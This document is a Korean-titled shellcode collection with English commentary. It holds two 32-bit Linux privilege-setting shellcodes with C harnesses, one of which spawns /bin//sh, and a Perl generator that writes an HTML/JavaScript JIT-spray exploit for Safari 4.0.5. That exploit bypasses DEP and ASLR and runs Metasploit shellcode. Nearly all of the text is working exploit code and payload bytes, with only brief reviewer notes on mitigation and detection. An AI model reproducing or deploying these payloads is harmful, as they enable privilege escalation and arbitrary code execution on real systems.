Shellcode 모음

uid, gid 설정 및 실행 파일 설정

/*
 * Payload #1: raw machine-code bytes; the per-line comments are the
 * original author's. Per the heading above it sets uid/gid and then runs
 * the program whose path, "/tmp/go", is embedded as plain ASCII at the end
 * of the string. The `\xcd\x80` (int 0x80) sequence marks this as 32-bit
 * Linux x86 code.
 *
 * This is a non-const global, i.e. it lives in writable data; whether that
 * memory is also executable — which the jump in `main` below needs — is
 * decided by the binary's NX/W^X settings, not by this declaration.
 */
char shellcode[] =
"\x31\xc0\xb0\x46\x66\xbb\x66\x02\x66\xb9\x66\x02\xcd\x80"    // uid 614
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/go";    // runs /tmp/go

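/*
 * Harness: prints the payload length, then transfers control to the bytes
 * in the global `shellcode`.
 *
 * Needs <stdio.h> (printf) and <string.h> (strlen); this listing includes
 * neither, so both calls are implicit declarations unless the includes are
 * added at the top of the file.
 *
 * The jump casts a data pointer to a function pointer and calls it. The C
 * standard does not define that conversion, and it only does anything when
 * the array sits in executable memory — with a non-executable data segment
 * (NX / W^X) the call typically faults instead of running the payload.
 *
 * Returns 0 only if control ever comes back from the called bytes.
 */
int main(void)
{
    /* strlen() returns size_t, so %zu is the matching conversion; the
     * original %d was a type mismatch and the format string also carried a
     * stray trailing quote. */
    printf("Length: %zu bytes.\n", strlen(shellcode));
    (*(void (*)(void)) shellcode)();

    return 0;
}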

Universal setreuid() shellcode (출처 : http://hkpco.kr/paper/universal%20setreuid%20shellcode.txt)

/*
 * Payload #2: "universal" setreuid shellcode (source URL in the heading
 * above). The author's comments label the two halves: a
 * setreuid(geteuid(), geteuid()) prologue, then the payload proper — the
 * ASCII bytes `\x2f\x62\x69\x6e` and `\x2f\x2f\x73\x68` in the second line
 * spell "/bin" and "//sh", i.e. a shell is launched. Again 32-bit Linux x86
 * (int 0x80 via `\xcd\x80`).
 *
 * Non-const global, i.e. writable data; the jump in `main` below only works
 * if that memory is also executable, which NX/W^X builds prevent.
 */
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"    // setreuid( geteuid() , geteuid() );
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";    // shellcode

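/*
 * Harness: prints the payload length, then transfers control to the bytes
 * in the global `shellcode`.
 *
 * Needs <stdio.h> (printf) and <string.h> (strlen); this listing includes
 * neither, so both calls are implicit declarations unless the includes are
 * added at the top of the file.
 *
 * The jump casts a data pointer to a function pointer and calls it. The C
 * standard does not define that conversion, and it only does anything when
 * the array sits in executable memory — with a non-executable data segment
 * (NX / W^X) the call typically faults instead of running the payload.
 *
 * Returns 0 only if control ever comes back from the called bytes.
 */
int main(void)
{
    /* strlen() returns size_t, so %zu is the matching conversion; the
     * original %d was a type mismatch and the format string also carried a
     * stray trailing quote. */
    printf("Length: %zu bytes.\n", strlen(shellcode));
    (*(void (*)(void)) shellcode)();

    return 0;
}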

Script JIT shellcode generator for DEP and ASLR bypass (출처 : http://shell-storm.org/shellcode/files/shellcode-686.php)

#!/usr/bin/perl
#
# Script JIT shellcode generator
# for DEP and ASLR bypass
# tested on Safari (ver. 4 and 5)
# By Alexey Sintsov (dookie at inbox.ru / a.sintsov at dsec.ru)
# from Digital Security 
# [www.dsecrg.com]
# 
# Details: http://dsecrg.com/pages/pub/show.php?id=26
# P.S. here is 0x1000 as mul. factor: (0x0000XXYY*0x00010000=0xXXYY0000)
# this much better for automatic generation than mul. of sqrt of 0xXXYY0000 8)
#
#
# Safari 4.0.5 Memory corruption exploit
# Orig exploit by Krystian Kloskowski
# (used for demo)
#
#
# Special for www.xakep.ru
# 
# Usage:perl safari_jit.pl > exploit.html
#
# 
#
# Reviewer notes (historical PoC, kept to illustrate the technique):
# - The script is only a generator: it assembles one HTML string and
#   prints it to stdout (the final `print $page`); it does not run the
#   page itself.
# - The payload is carried as a long chain of 32-bit XOR immediates
#   ("0x14EB....^" below). The technique depends on the JIT copying those
#   constants verbatim into an executable page; as far as I know the
#   counter-measure engines adopted for this is constant blinding (masking
#   immediates at emit time). For content inspection, the repeated
#   `^0x14EB` prefix inside script constants is the artifact worth matching.
#
    #Shellcode from Metasploit - Exec CALC
    $shellcode = 
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
    "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
    "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
    "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
    "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
    "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
    "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
    "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
    "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
    "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
    "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" .
    "\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" .
    "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" .
    "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5calc\x00";

    #Address with RWX - place for shellcode
    $addr="\x08\x0A"; #0x080A0000

#################################################################
########                     BEGIN                    ###########
#################################################################    

    # Append ($len % 4) bytes of 0xCC (int3) to the payload before it is
    # split into 4-byte groups below.
    $len=length($shellcode);

    $add=$len % 4;

    $copyJit="";

    for($i=0;$i<$add;$i++)
    {
        $shellcode.="\xCC";
    }

    # Filler constants emitted ahead of the real chain; the JS comment
    # markers embedded here show where the copied bytes begin.
    $offsetJit="\"0x22222222^\"+/* START OF OFFSET */\n".
            "\"0x22222222^\"+\n".
            "\"0x22222222^\"+\n".
            "\"0x22222222^\"+\n".
            "\"0x22222222^\"+\n".
            "\"0x22222222^\"+\n".
            "\"0x22222222^\"+\n".
            "\"0x22222222^\"+\n".
            "\"0x22222222^\"+ /*SHELLCODE BEGINS*/\n";    

    # Init JIT shelcode
    # The two sprintf lines splice the bytes of $addr into the chain.
    $initJit="\"0x14EBC031^\"+//XOR EAX,EAX\n".
             "\"0x14EB01B4^\"+\n". 
             "\"0x14EB00B0^\"+\n".
             "\"0x14EBE0F7^\"+// EAX=0x100*0x100\n". 
             "\"0x14EBF08B^\"+// MOV ESI, EAX ;ESI=00010000 - MUL factor\n". 
             "\"0x14EBC031^\"+ //XOR EAX,EAX\n".
             sprintf("\"0x14EB%02lxB4^\"+\n",ord substr($addr,0,1)).
             sprintf("\"0x14EB%02lxB0^\"+\n",ord substr($addr,1,1)).
             "\"0x14EBE6F7^\"+ // MUL ESI; EAX - RWX memory for shellcode\n".
             "\"0x14EBC88B^\"+ // mov ecx, eax ; ECX - pointer on RWE mem\n".
             "\"0x14EBDB33^\"+ // xor ebx, ebx\n".
             "\"0x14EB04B3^\"+ // mov bl, 4    ; EBX = 0x4 - step \n";

    #Convert shellcode into JIT code
    # One 4-byte group of $shellcode per iteration, emitted as a fixed
    # template of eight constants; bytes are read back to front
    # ($byte1 = offset i+3 ... $byte4 = offset i).
    for($i=0;$i<length($shellcode);$i+=4)
    {
        my $val="";
        $byte1=substr($shellcode,($i+3),1);
        $byte2=substr($shellcode,($i+2),1);
        $byte3=substr($shellcode,($i+1),1);
        $byte4=substr($shellcode,($i),1);
        $val.="\"0x14EBC031^\"+ //XOR EAX,EAX\n";
        $val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte1);
        $val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte2);
        $val.= "\"0x14EBE6F7^\"+ //MUL ESI\n";
        $val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte3);
        $val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte4);
        $val.="\"0x14EB0189^\"+ // mov [ecx], eax ; copy part of shellcode to RWX page\n".
              "\"0x14EBCB03^\"+ // add ecx, ebx ; ecx=ecx+4 - move pointer for next copy\n";

        $copyJit.=$val;

    }

    # Tail of the constant chain (see the author's inline comments).
    $jumJit="\"0x14EB00B5^\"+ // mov ch, 00\n".
            "\"0x14EB00B1^\"+ // mov cl, 00 ; ECX - RWE memory WITH shellcode\n".
            "\"0x14EBE1FF^\"+ // JMP ECX ; PROFIT! \n";

    # Page skeleton: a Perl double-quoted string, so the \" escapes below are
    # literal quotes in the emitted HTML/JS. The chain built above is
    # concatenated between $page and $endPage at the bottom of the script.
    $page="
<!-- 
JIT-SPRAY
           for
                 Safari 4.0.5 - 5.0.0

(vuln for 4.0.5 only)

JavaScript JIT SHELLCODE and spray
             for
         ASLR / DEP bypass (Win x32)

By Alexey Sintsov
   from Digital Security research Group

special for www.xakep.ru

[DSecRG]
www.dsecrg.com

-->

<script>

function make_buf(payload, len) {
    while(payload.length < (len * 4)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}

function fff()
{

    var a = parent;

    var buf = make_buf(unescape('%u0104%u0606'), 68000);

    a.prompt(alert);
    a.prompt(buf);
    a.close();
    a.prompt(alert);

}

var SPRAY=\"\";

var JIT=\"{ \"+
\"var y=(\"+
";

# Closing part of the page: the last constant ends the XOR chain, then the
# loop that defines/calls the generated functions and the fff() trigger.
$endPage="\"0x14ebcccc\"+
\");\"+
\"return y; }\";

var zl=\"zlo_\";

for (var i=1;i<800;i++)
{
    SPRAY+=\"function \"+zl+i+\"()\"+JIT+\" \"+zl+i+\"();\";
}

eval(SPRAY);

fff();
</script>

</center>";

#build page
$page.=$offsetJit.$initJit.$copyJit.$jumJit.$endPage;

# Output goes to stdout; redirect it to a file as the usage line says.
print $page;
